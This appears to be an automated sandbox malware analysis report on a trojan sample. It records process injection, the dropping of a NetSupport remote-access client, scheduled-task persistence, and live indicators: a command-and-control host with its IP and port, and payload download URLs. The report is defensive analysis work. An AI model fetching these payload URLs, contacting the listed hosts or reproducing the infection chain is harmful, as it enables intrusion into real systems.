                                Source: client32.exe, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr | Binary or memory string: Progman
                                Source: client32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr | Binary or memory string: Progman<
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 4_2_00407B48 cpuid
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage | 7_2_111700E5
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA | 7_2_11170376
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s | 7_2_11170419
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: GetLocaleInfoA | 7_2_11167A6E
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA | 7_2_1116FFE3
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 7_2_1116FEEE
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen | 7_2_1117008A
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA | 7_2_111703DD
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage | 7_2_111702B6
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 7_2_6CD71CC1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: GetLocaleInfoA | 7_2_6CD7DC99
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat | 7_2_6CD7DC56
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA | 7_2_6CD71DB6
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage | 7_2_6CD71EB8
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen | 7_2_6CD71E5D
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free | 7_2_6CD70F39
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW | 7_2_6CD6FAE1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea | 7_2_6CD7DB7C
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement | 7_2_6CD71680
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage | 7_2_6CD72089
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA | 7_2_6CD721DC
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: EnumSystemLocalesA | 7_2_6CD72151
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA | 7_2_6CD72175
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,7_2_6CD702AD
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,7_2_6CD71257
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_6CD72218
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,7_2_6CE0888A
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,free,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,___wtomb_environ,_malloc_crt,_malloc_crt,free,__recalloc_crt,__recalloc_crt,_strlen,_calloc_crt,_strlen,strcpy_s,SetEnvironmentVariableA,_errno,free,free,__invoke_watson,7_2_6CE08468
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,7_2_6CE065F0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,7_2_6CE085AC
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,WideCharToMultiByte,_freea_s,7_2_6CE086E1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,7_2_6CE086FD
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,7_2_6CE0871C
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,9_2_11170419
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoA,9_2_11167A6E
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,9_2_1116FFE3
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_1116FEEE
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,9_2_1117008A
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,9_2_111700E5
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_11170376
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_111703DD
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,9_2_111702B6
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeQueries volume information: C:\Users\user\Desktop\Jjv9ha2GKn.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110F1070 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,7_2_110F1070
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00407771 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00407771
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_1103B170 _calloc,GetUserNameA,_free,_calloc,_free,7_2_1103B170
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_11171199 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,7_2_11171199
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_1109D240 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,7_2_1109D240
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_1106F200 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,7_2_1106F200
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_110D5D90 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,7_2_110D5D90
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_6CD4A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,7_2_6CD4A980
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_1106F200 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,9_2_1106F200
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_110D5D90 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,9_2_110D5D90
                                Source: Yara match | File source: 9.2.client32.exe.6f6f0000.5.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 7.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 7.2.client32.exe.6ceb0000.5.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 9.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 9.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 7.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 9.2.client32.exe.6ceb0000.4.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 7.2.client32.exe.6f6f0000.6.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 7.2.client32.exe.111b32a0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 9.2.client32.exe.111b32a0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 7.2.client32.exe.6cd40000.3.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 9.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000007.00000002.3301652835.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara match | File source: Process Memory Space: client32.exe PID: 828, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: client32.exe PID: 6044, type: MEMORYSTR
                                Source: Yara match | File source: C:\Users\user\AppData\Local\DNScache\client32.exe, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\DNScache\pcicapi.dll, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\DNScache\AudioCapture.dll, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL, type: DROPPED
                                MITRE ATT&CK Matrix (techniques listed per tactic, with the signature-count digits shown in the report kept in front of the technique name)
                                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
                                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
                                Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
                                Execution: 1 Windows Management Instrumentation; 14 Native API; 1 Scheduled Task/Job; 2 Service Execution; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
                                Persistence: 1 DLL Side-Loading; 2 Valid Accounts; 1 Windows Service; 1 Scheduled Task/Job; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                                Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 1 Windows Service; 323 Process Injection; 1 Scheduled Task/Job; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                                Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 2 Valid Accounts; 41 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 323 Process Injection; 1 Hidden Files and Directories
                                Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
                                Discovery: 12 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 45 System Information Discovery; 251 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery; System Network Connections Discovery; Process Discovery
                                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
                                Collection: 1 Archive Collected Data; 1 Screen Capture; 1 Input Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
                                Command and Control: 2 Ingress Tool Transfer; 21 Encrypted Channel; 11 Non-Standard Port; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
                                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
                                Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                Behavior Graph ID: 1572207 | Sample: Jjv9ha2GKn.exe | Start date: 10/12/2024 | Architecture: WINDOWS | Score: 100
                                Root node, contacted hosts: ganeres1.com; geo.netsupportsoftware.com; cycleconf.com
                                Root node, signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 7 other signatures
                                Root node, started processes: Jjv9ha2GKn.exe 3; client32.exe
                                Jjv9ha2GKn.exe, dropped: C:\Users\user\AppData\...\Jjv9ha2GKn.exe.log, ASCII
                                Jjv9ha2GKn.exe, signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign processes
                                Jjv9ha2GKn.exe, started processes: AddInProcess32.exe 40
                                AddInProcess32.exe, contacted hosts: cycleconf.com 23.254.224.41, 443, 49831, 49837 HOSTWINDSUS United States
                                AddInProcess32.exe, dropped: C:\Users\user\AppData\...\remcmdstub.exe, PE32; C:\Users\user\AppData\Local\...\pcicapi.dll, PE32; C:\Users\user\...\msvcp140_codecvt_ids.dll, PE32; 14 other files (4 malicious)
                                AddInProcess32.exe, signatures: Found evasive API chain (may stop execution after checking mutex); Uses schtasks.exe or at.exe to add and modify task schedules
                                AddInProcess32.exe, started processes: client32.exe 17; schtasks.exe 1
                                client32.exe, contacted hosts: ganeres1.com 88.210.12.58, 3785, 49865 CITYLAN-ASRU Russian Federation; geo.netsupportsoftware.com 104.26.0.231, 49869, 80 CLOUDFLARENETUS United States
                                client32.exe, signatures: Multi AV Scanner detection for dropped file; Contains functionality to change the wallpaper; Delayed program exit found; Contains functionality to detect sleep reduction / modifications
                                schtasks.exe, started processes: conhost.exe

                                Source | Detection | Scanner | Label
                                Jjv9ha2GKn.exe | 47% | ReversingLabs | Win32.Trojan.Jalapeno
                                Jjv9ha2GKn.exe | 100% | Avira | TR/Kryptik.qykkd
                                Jjv9ha2GKn.exe | 100% | Joe Sandbox ML |
                                Source | Detection | Scanner | Label
                                C:\Users\user\AppData\Local\DNScache\AudioCapture.dll | 3% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL | 3% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL | 3% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\PCICL32.DLL | 17% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL | 3% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\client32.exe | 21% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\msauserext.dll | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\mscat32.dll | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\mscpx32r.dLL | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\mscpxl32.dLL | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\msvcp140_1.dll | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\msvcp140_codecvt_ids.dll | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\msvcr100.dll | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\neth.dll | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\netmsg.dll | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\pcicapi.dll | 3% | ReversingLabs |
                                C:\Users\user\AppData\Local\DNScache\remcmdstub.exe | 5% | ReversingLabs |
                                No Antivirus matches
                                No Antivirus matches
                                Source | Detection | Scanner | Label
                                https://cycleconf.com/dwnld/2nd2_4.zip2 | 0% | Avira URL Cloud | safe
                                https://cycleconf.com/dwnld/2nd2_1.zip2 | 0% | Avira URL Cloud | safe
                                https://cycleconf.com/dwnld/2nd2_2.zip5 | 0% | Avira URL Cloud | safe
                                http://127.0.0.1 | 0% | Avira URL Cloud | safe
                                https://cycleconf.com/dwnld/2nd2_4.zip | 100% | Avira URL Cloud | phishing
                                http://88.210.12.58/fakeurl.htm | 0% | Avira URL Cloud | safe
                                http://www.crossteccorp.com | 0% | Avira URL Cloud | safe
                                https://cycleconf.com/Q) | 0% | Avira URL Cloud | safe
                                https://cycleconf.com/dwnld/2nd2_1.zip | 100% | Avira URL Cloud | phishing
                                https://cycleconf.com/dwnld/2nd2_1.zipLhttps://cycleconf.com/dwnld/2nd2_2.zipLhttps://cycleconf.com/ | 0% | Avira URL Cloud | safe
                                https://cycleconf.com/dwnld/2nd2_2.zip | 100% | Avira URL Cloud | phishing
                                http://geo.netsupportsoftware.comlocation/loca.asp | 0% | Avira URL Cloud | safe
                                http://crl.microso8 | 0% | Avira URL Cloud | safe
                                https://cycleconf.com/Z) | 0% | Avira URL Cloud | safe
                                https://cycleconf.com/dwnld/2nd2_3.zip | 100% | Avira URL Cloud | phishing
                                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                geo.netsupportsoftware.com | 104.26.0.231 | true | false | | high
                                ganeres1.com | 88.210.12.58 | true | true | | unknown
                                cycleconf.com | 23.254.224.41 | true | false | | unknown
                                Name | Malicious | Antivirus Detection | Reputation
                                http://geo.netsupportsoftware.com/location/loca.asp | false | | high
                                https://cycleconf.com/dwnld/2nd2_4.zip | false | Avira URL Cloud: phishing | unknown
                                http://88.210.12.58/fakeurl.htm | true | Avira URL Cloud: safe | unknown
                                https://cycleconf.com/dwnld/2nd2_1.zip | false | Avira URL Cloud: phishing | unknown
                                https://cycleconf.com/dwnld/2nd2_2.zip | false | Avira URL Cloud: phishing | unknown
                                https://cycleconf.com/dwnld/2nd2_3.zip | false | Avira URL Cloud: phishing | unknown
                                Name | Source | Malicious | Antivirus Detection | Reputation
                                http://www.netsupportsoftware.com | PCICL32.DLL.4.dr | false | | high
